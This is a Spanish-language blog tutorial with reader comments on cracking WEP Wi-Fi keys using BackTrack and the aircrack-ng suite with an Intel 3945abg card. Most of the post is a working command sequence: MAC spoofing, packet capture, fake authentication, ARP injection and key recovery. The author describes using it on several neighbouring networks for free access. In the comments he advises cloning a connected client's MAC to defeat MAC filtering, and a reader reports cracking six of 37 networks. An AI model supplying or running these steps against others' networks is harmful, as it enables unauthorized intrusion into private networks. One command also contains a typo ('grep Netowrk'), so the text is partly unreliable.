Uno de mis primeros post (para ser exacto el séptimo) fue el mostrar cómo Romper claves WEP, y comenzaron a preguntarme si era necesaria otra tarjeta para poder hacer el procedimiento, a lo cual para mi desconocimiento amplio en esos momento sobre el tema era que si, era completamente necesaria otra tarjeta inalámbrica compatible con la distribución de Linux Backtrack para poder vulnerar la clave de seguridad WEP, que la mayoría de los usuarios promedio usan en sus routers, ya sea porque viene por default o no conocen otras opciones para proteger el acceso a sus redes inalámbricas.
En esta semana requería forzosamente segunda red con internet porque a la red que estaba conectado estaba MUY lenta, y me volvió a entrar la duda de cómo obtener la clave si no traía mi tarjeta inalámbrica externa, después de 2 horas de ardua lectura de la documentación del Backtrack y unos cuántos blogs, encontré la manera de aplicar un método INFALIBLE a pesar de poca señal inclusive, y lo mejor de todo… con la tarjeta que la mayoría de las portátiles trae… la Intel 3945abg.
Lo que necesitamos es:
- Distribución de Linux Backtrack.
- Un equipo con tarjeta Intel 3945 (que a partir de cierto paso es igual para casi todas las demás tarjetas sólo que sean capaces de inyectar paquetes)
Teniendo esto comenzamos booteando nuestro equipo con la distribución de Backtrack y elegimos la opción de gráficos KDE.
UPDATE: Al momento de escribir código (no los números) pueden ir pulsando la tecla TAB (tabulador, la de las flechas en ambas direcciones) para que les complete los comandos y no suframos escribiendo estríctamente todo el código letra por letra y nos equivoquemos en el camino, sólo es necesario pulsar las letras iniciales y pulsar TAB para que complete el código.
Enseguida podremos verificar si tenemos una tarjeta Intel 3945abg con el siguiente comando:
lspci | grep Netowrk
Mostrándonos que efectivamente tenemos esa tarjeta
0c:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev02)
Lo que haremos es cambiar el modo de uso de la Intel 3945abg para poder monitorear e inyectar paquetes con estos comandos:
rmmod iwl3945
modprobe ipwraw
A partir de este paso, las instrucciones son las mismas para la mayoría del resto de las tarjetas.
Una vez hecho esto escribimos este comando para ver cómo es que la distribución llama a nuestra tarjeta, que será la que NO nos marque “no wireless extensions“, que en mi caso le llama wifi0:
iwconfig
Esta tarjeta la camuflajearemos cambiando su MAC, para ello la deshabilitaremos, cambiamos y volvemos a habilitar:
airmon-ng stop wifi down
ifconfig wifi0 down
macchanger –mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
Ahora exploraremos todas las redes disponibles que alcance a detectar nuestra tarjeta con:
airodump-ng wifi0
Ya exploradas todas las redes, pulsamos Control+C y elegimos la red a vulnerar, y copiamos su MAC o BSSID, ya que la necesitaremos en varias ocasiones más adelante, aparte de ello iniciamos con el proceso de inyección de paquetes para romper su seguridad con este código:
airodump-ng -c (canal de transmisión, columna CH) -w (nombre del archivo de captura) –bssid (MAC del router de red destino que copiamos) wifi0
Lo que para mi ejemplo quedó así:
airodump-ng -c 3 -w jafrancov –bssid 00:21:7C:D0:71:89 wifi0
Abrimos una nueva ventana y nuestra siguiente instrucción hará una Autenticación/Asociación con el Router, si esta es correcta nos regresará una carita feliz como esta –> : – )
aireplay-ng -1 0 -a (MAC del router de la red destino que copiamos) -h 00:11:22:33:44:55 wifi0
Para mi ejemplo:
aireplay-ng -1 0 -a 00:21:7C:D0:71:89 -h 00:11:22:33:44:55 wifi0
Seguido y si es bien logrado colocamos el siguiente código para la inyección de paquetes, dado ” enter” nos preguntará si deseamos usar el paquete que nos muestra, presionamos la tecla ‘Y’ y damos enter, para que inicie el proceso:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (MAC del router de red destino) -h 00:11:22:33:44:55 wifi0
Para mi ejemplo:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:21:7C:D0:71:89 -h 00:11:22:33:44:55 wifi0
Hecho todo lo anterior sólo nos resta esperar un poco a que el valor de la columna “#Data” comience a aumentar, pasados los 10,000 datos intercambiados abrimos una nueva ventana de consola y escribimos:
aircrack-ng (Nombre que dieron al archivo de captura)-01.cap
Nueva y por última vez para mi ejemplo:
aircrack-ng jafrancov-01.cap
Automáticamente nos llevará a una pantalla donde prueba todas las posibles claves, si los datos de los paquetes inyectados no arrojaran una clave válida, nos indicará que intentemos pasados cada 5,000 IVs, que es lo mismo que el número de la columna ‘#Data’, pasados los 160,000 es 100% probable que obtengamos una clave WEP común de 64 bits hexadecimal, en lo personal he visto una tendencia de usuarios a usar sólo números, así que a partir de los 10,000 IVs es bueno comenzar a probar, cuando sea descubierta la clave nos lanzará un texto que dice “KEY FOUND! [Clave]“, ese número es la clave WEP que nos pide el router al intentar conectarnos.
Este método lo usé ya con varias redes incluyendo de las de menor señal y aún así se pudo obtener la clave y libre acceso a internet y la red local del router como se puede ver en la imagen:
No me queda más que recomendar cambiar de protocolo de seguridad a WPA por ejemplo, que hasta el momento es de los más seguros para redes inalámbricas, disfruten el post y puede ser una buena opción cuando se requiere de urgencia tener internet… je
Enjoy this Life!!
Quizá también te interese...
136 Responses to “Rompiendo WEP con la tarjeta Intel 3945”
Trackbacks/Pingbacks
- La seguridad WEP en Wifi « Lógicamente todo no es lógico - [...] http://www.freewebs.com/thebyber/crackearwep.htm http://foro.el-hacker.com/index.php/topic,169792.0.html http://jafrancov.com/es/2009/07/rompiendo-wep-con-la-tarjeta-intel-3945/ [...]
- Romper seguridad de redes inalámbricas (WiFi) con tu iPod Touch o iPhone | Alex Franco - [...] en un anterior post comenté lo fácil que era romper claves WEP con la tarjeta Intel 3945abg, bien ahora ...
Leave a Reply
Additional comments powered by BackType
Hola!
Muchas gracias por el tutorial para tarjetas 3945, me ha servido mucho, es muy claro y las imágenes son de muy buena calidad. Hasta ahorita he podido obtener 6 claves WEPs, de 37 posibles redes disponibles, quiero preguntarte si hay una manera de unir esas redes para crear una “Megaconexión”, he leído al respecto y no entiendo mucho la verdad, sólo que necesito más hadware, te agradacería tu opinión al respecto.
Muchas gracias por el tuto.
Atte.
Jorge
@JorgeEduardo Hola, gracias por tus comentarios, y con respecto a tu pregunta… si se puede hacer una “megaconexión” pero todo dependerá del hardware que tengas disponible, ya que hasta el momento (que yo conozca claro) sólo puedes realizar una conexión por cada tarjeta de red que cuentes, es decir por cada red que te quieras conectar necesitas una tarjeta independiente. Espero haya respondido a tu pregunta…
Saludos…
Hola de nuevo
OK, que tarjetas me recomiendas comprar, no conozco al respecto, he leído por ahí que con otro router inalámbrico se puede, pero mis conocimiento son muy básicos al respecto, además de que tengo que mejorar la recepción de la señal wifi con una antena casera.
Gracias por la info.
Lo he conseguido con varias redes, pero hay una con buena señal wep en la que no se mueve la columna DATA lo he intentado varias veces y nada ¿por qué? Gracias
Puede ser por probables 3 cosas,
1) Asegúrate que sea seguridad WEP y no WPA, en caso que si se WEP olvida esto
2) Asegúrate que existan otros equipos conectados a la red, eso te darás cuenta en la parte baja de cuando se envían los paquetes, si hay información en esa parte, sólo queda una opción más
3) Que el router tenga seguridad WEP más filtrado por MAC, esto quiere decir que necesitas conocer la MAC (dirección física xx:xx:xx:xx:xx:xx) de un equipo autenticado o conectado a la red, la cuál no es tan sencilla de obtener, pero si te aparece en la parte de datos una MAC de un equipo, al momento de hacer el macchanger pon esa MAC y tendrás acceso
Saludos…
Hola, espero se encuentren bien, por otra parte, quisiera saber si esto funciona haciendolo desde una iBook o una iMac.
Saludos
No estoy seguro, pero… se podrá hacer con una máquina virtual de VMWare o en su caso booteando normal, pero, las mac (ninguna) trae la tarjeta intel 3945abg, así que necesitará una tarjeta wifi externa USB, y seguir algo como este tutorial http://jafrancov.blogspot.com/2008/10/rompiendo-claves-wep.html
Saludos…
el link para bajar el BackTrack a cambiado:
http://www.backtrack-linux.org/downloads/
batalle un poco para encontrarlo, por favor actualiza ese link a tu post…
=D y fuera del tema, te queria preguntar, como tienes tu propio dominio (jafrancov.com) es que me gustaria tener el mio.
gracias, y felicidades por tu blog XD
Ohhh :O muchas gracias por el feedback y el dominio pues… lo compras con un prestador de esos servicios, como GoDaddy, Dreamhost, Neubox y un largo etcétera, aparte del dominio (el nombre) necesitas hosting (donde guardar todo el sitio) que los mismo que mencioné te pueden servir. Gracias por comentar…
Saludos =D
hola esta excelente esto gracias!!
disculpa sirve con una “Intel Wireless WiFi Link 4965AGN”
que tendria que hacer para el monitoreo e inyeccion de paquetes???
o bueno antes de los pasos para la mayoría del resto de las tarjetas???
agradezco tu ayuda gracias
@danniel9 Hola Daniel, grx por tu comentario, mira, yo no he tenido la oportunidad de probar con muchas tarjetas intel, incluyendo la de tu pregunta, he probado con externas con chips ralink, linksys, entre otras, te recomiendo lo intentes a partir de la segunda imagen, que son los pasos genéricos para casi cualquier otra tarjeta, aún sigo buscando solución para poder hacerlo con cualquier tarjeta, espero pronto tenerlo.
Saludos!!
This will be significant!|I attempt to depict similar soulful information
Amigo felicitaciones por tu pag, me parece que explicas todo muy bien. Sin embargo tengo una duda.
Sigo todos tus pasos, logro una autentificacion exitosa, pero al momento de colocar este comando:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (MAC del router de red destino) -h 00:11:22:33:44:55 wifi0
Claro con sus respectivos cambios, como la mac de origen y destino. simplemento al dar ENTER me aparece es READ paquets y el numero de paquetes va en ascenso, no logro apreciar la pantalla que tu colocas en donde debo pulsar Y. En efecto no logro inyectar paquetas.
Nota: no hay mas usuarios conectados al router dado que pruebo con el mio.
Ups… pequeño detalle ahí, si necesita haber al menos un usuario que esté conectado a esa red para poder autentificarte e inyectar paquetes correctamente =S prueba con cualquier otro dispositivo con WiFi, no necesariamente una computadora, espero tengas éxito, Saludos!!
No existe alguna forma de realizar la inyeccion sin usuarios conectados a la red?
@José hasta el momento yo no lo he logrado, lo q a veces he hecho y funciona es abrir 2 terminales haciendo la inyección, así simulas que hay alguien más, pero no siempre funciona =S
Franco, gracias por responder. Cuando te refieres a dos terminales, hablamos de dos pc corriendo backtrack y que me autentifique con cada una de ellas?
Amigo todo calidad, pero tengo uan duda al final cuando empieza la inyeccion de paquetes ya llevo ponte 43000 paquetes inyectados, pero la columna #data nada que se mueve tiene como 9 nada mas. ¿que puede estar pasando?
@Alejandro ahmmm quizá tienes el mismo problema que @Jose, te has asegurado que haya alguien conectado a la red?? la mayoría de las veces que no inyecta es por esa razón… saludos y éxito!!
Se encuentra dentro de los temas que me interesan, pero nose si puedo realizarlo en mi pc. Soy analfabeta en esto de descargar programas y nose mucho de computadoras, por eso te pediria que me ayudes por favor. Yo tengo una lapto aspire one de 10.1”. Será q cumple con lo que se necesita.
Bueno si tines tiempito porfa ayudame, y de todos modos ¡gracias!!!
@supnet45 Qué versión del Backtrack estás usando?? lo comento porque en el 3 y 4 no pide ni usuario ni contraseña, te recomiendo uses la 3 ya que la 4 está en beta, pero si aún así la pide, el usuario es root y el password es toor.
Saludos…
@supnet45 Qué versión del Backtrack estás usando?? lo comento porque en el 3 y 4 no pide ni usuario ni contraseña, te recomiendo uses la 3 ya que la 4 está en beta, pero si aún así la pide, el usuario es root y el password es toor.
Saludos…
@Joha Ouch… necesitaría saber el modelo de tu tarjeta inalámbrica, consigue un programa que se llama Everest y te da el resumen de hardware de tu máquina, si me das el modelo de la tarjeta quizá pueda ayudarte, saludos!!
Yo queria saber si solo es con esa tarjeta ya que yo tengo una intel 4965AGN me servira igual o no??
Bueno espero tu resp……..
@Cristian Estoy buscando alguna version que evite todo este rollo y dar la opción para que puedan hacerlo con cualquier tarjeta, si se puede con la 4965AGN pero, desconozco si es automático, intenta hacer el iwconfig y verifica, si aparace entonces continúa los pasos a partir de ese comando
¿¿Que versión de Linux Backtrack estás usando??, si es la versión 4, que es con la que algunos han tenido broncas, descárgate la versión 3, ya que la 4 aún está en Beta y puede llegar a tener broncas, y otra pregunta, al momento de que haces el “lspci | grep Netowrk” si te muestra que tu tarjeta es la 3945ABG??
Saludos…
¿¿Que versión de Linux Backtrack estás usando??, si es la versión 4, que es con la que algunos han tenido broncas, descárgate la versión 3, ya que la 4 aún está en Beta y puede llegar a tener broncas, y otra pregunta, al momento de que haces el “lspci | grep Netowrk” si te muestra que tu tarjeta es la 3945ABG??
Saludos…
Es correcto @Luna solamente es temporal, mientras estés usando el linux backtrack, al regresar a tu sistema operativo base regresa todo a la normalidad.
Saludos…
Es correcto @Luna solamente es temporal, mientras estés usando el linux backtrack, al regresar a tu sistema operativo base regresa todo a la normalidad.
Saludos…
@Fran en efecto, lo más seguro es que sea eso, puedes checar este post para que no tengas que quemar el iso y lo instales en una memoria USB.
Saludos…
@Fran en efecto, lo más seguro es que sea eso, puedes checar este post para que no tengas que quemar el iso y lo instales en una memoria USB.
Saludos…
Hola, gracias por el Feedback, me puedes decir ¿¿dónde tengo errores por favor?? Thx y gracias por tu comment
Hola, gracias por el Feedback, me puedes decir ¿¿dónde tengo errores por favor?? Thx y gracias por tu comment
@izaria2 a lo primero creo que no entiendo en qué parte del proceso aplicas eso, digo, los paquetes son automático y es 100% segura la obtención de la clave, para lo segundo, no vienen con ninguna distro que yo sepa, sin embargo puedes hacerlo, en el otro post de las redes con seguridad WPA dejé los links, puedes checarlo allí
Sin embargo aquí sigo investigando más sobre el tema, gracias por tu comment, Saludos…
@izaria2 a lo primero creo que no entiendo en qué parte del proceso aplicas eso, digo, los paquetes son automático y es 100% segura la obtención de la clave, para lo segundo, no vienen con ninguna distro que yo sepa, sin embargo puedes hacerlo, en el otro post de las redes con seguridad WPA dejé los links, puedes checarlo allí
Sin embargo aquí sigo investigando más sobre el tema, gracias por tu comment, Saludos…